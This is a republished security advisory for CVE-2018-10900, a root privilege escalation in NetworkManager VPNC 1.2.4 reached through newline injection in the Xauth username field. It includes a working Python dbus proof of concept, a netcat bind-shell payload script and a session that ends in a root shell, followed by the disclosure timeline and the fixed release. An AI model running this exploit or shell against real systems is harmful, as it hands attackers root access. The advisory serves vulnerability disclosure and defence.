首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Network Manager VPNC 1.2.4 Privilege Escalation
来源:https://pulsesecurity.co.nz 作者:Andzakovic 发布时间:2018-07-25  
Network Manager VPNC - Privilege Escalation (CVE-2018-10900)

Release URL: https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc
Date Released: 21/07/2018  
CVE: CVE-2018-10900
Author: Denis Andzakovic  
Source: https://gitlab.gnome.org/GNOME/NetworkManager-vpnc  
Affected Software: Network Manager VPNC a 1.2.4  

--[ Description
The Network Manager VPNC plugin is vulnerable to a privilege escalation attack. A new line character can be used to inject a Password helper parameter into the configuration data passed to VPNC, allowing an attacker to execute arbitrary commands as root. 

--[ Privilege Escalation

When initiating a VPNC connection, Network Manager spawns a new vpnc process and passes the configuration via STDIN. By injecting a \n character into a configuration parameter, an attacker can coerce Network Manager to set the Password helper option to an attacker controlled executable file.

The following python script generates a VPNC connection which will execute the /tmp/test file when connected. The new line character is injected into the Xauth username parameter.

import dbus
con = {
    'vpn':{
        'service-type':'org.freedesktop.NetworkManager.vpnc',
        'data':{
            'IKE DH Group':'dh2',
            'IPSec ID':'testgroup',
            'IPSec gateway':'gateway',
            'IPSec secret-flags':'4',
            'Local Port':'0',
            'NAT Traversal Mode': 'natt',
            'Perfect Forward Secrecy': 'server',
            'Vendor': 'cisco',
            'Xauth password-flags': '4',
            'Xauth username': "username\nPassword helper /tmp/test",
            'ipsec-secret-type': 'unused',
            'xauth-password-type': 'unused'
            }
    },
    'connection':{
        'type':'vpn',
        'id':'vpnc_test',
    },
    'ipv4':{'method':'auto'},
    'ipv6':{'method':'auto'}
}
bus = dbus.SystemBus()
proxy = bus.get_object("org.freedesktop.NetworkManager", "/org/freedesktop/NetworkManager/Settings")
settings = dbus.Interface(proxy, "org.freedesktop.NetworkManager.Settings")
settings.AddConnection(con)

The above results in the following configuration being passed to the vpnc process when the connection is initialized:  

Debug 0
Script /usr/local/libexec/nm-vpnc-service-vpnc-helper 0 3950  --bus-name org.freedesktop.NetworkManager.vpnc.Connection_4
Cisco UDP Encapsulation Port 0
Local Port 0
IKE DH Group dh2
Perfect Forward Secrecy server
Xauth username username
Password helper /tmp/test
IPSec gateway gateway
IPSec ID testgroup
Vendor cisco
NAT Traversal Mode natt

The following figure details the complete privilege escalation attack.

doi@ubuntu:~$ cat << EOF > /tmp/test
> #!/bin/bash
> mkfifo pipe
> nc -k -l -p 8080 < pipe | /bin/bash > pipe
> EOF
doi@ubuntu:~$ python vpnc_privesc.py
doi@ubuntu:~$ nmcli connection
NAME                UUID                                  TYPE      DEVICE
Wired connection 1  a8b178fd-8cbc-3e15-aa9e-d52982215d98  ethernet  ens3
vpnc_test           233101cb-f786-44ed-9e4f-662f1a519429  vpn       ens3
doi@ubuntu:~$ nmcli connection up vpnc_test

^Z
[1]+  Stopped                 nmcli connection up vpnc_test
doi@ubuntu:~$ nc -vv 127.0.0.1 8080
Connection to 127.0.0.1 8080 port [tcp/http-alt] succeeded!
id
uid=0(root) gid=0(root) groups=0(root)

--[ Timeline

11/07/2018 - Advisory sent to security@gnome.org  
13/07/2018 - Acknowledgement from Gnome security  
20/07/2018 - CVE-2018-10900 assigned, patch scheduled for the following day  
21/07/2018 - Network Manager VPNC 1.2.6 released
21/07/2018 - Advisory released

--[  About Pulse Security
Pulse Security is a specialist offensive security consultancy dedicated to providing best in breed security testing and review services.

W: https://pulsesecurity.co.nz
E: info at pulsesecurity.co.nz




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Cisco Adaptive Security Applia
·SMPlayer 18.6.0 Memory Corrupt
·Micro Focus Secure Messaging G
·10-Strike Bandwidth Monitor 3.
·Tenda Wireless N150 Router 5.0
·10-Strike LANState 8.8 - Local
·Windows Speech Recognition - B
·GetGo Download Manager 6.2.1.3
·Davolink DVW 3200 Router - Pas
·CleanMyMac3 Local Privilege Es
·Splinterware System Scheduler
·Axis Network Camera Remote Com
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved